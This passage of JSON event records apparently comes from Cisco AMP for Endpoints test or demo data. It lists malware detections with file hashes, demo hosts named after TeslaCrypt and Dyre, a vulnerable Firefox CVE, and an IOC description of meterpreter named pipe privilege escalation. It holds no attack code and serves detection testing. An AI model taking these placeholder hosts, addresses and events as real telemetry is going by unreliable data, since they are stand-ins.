IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat 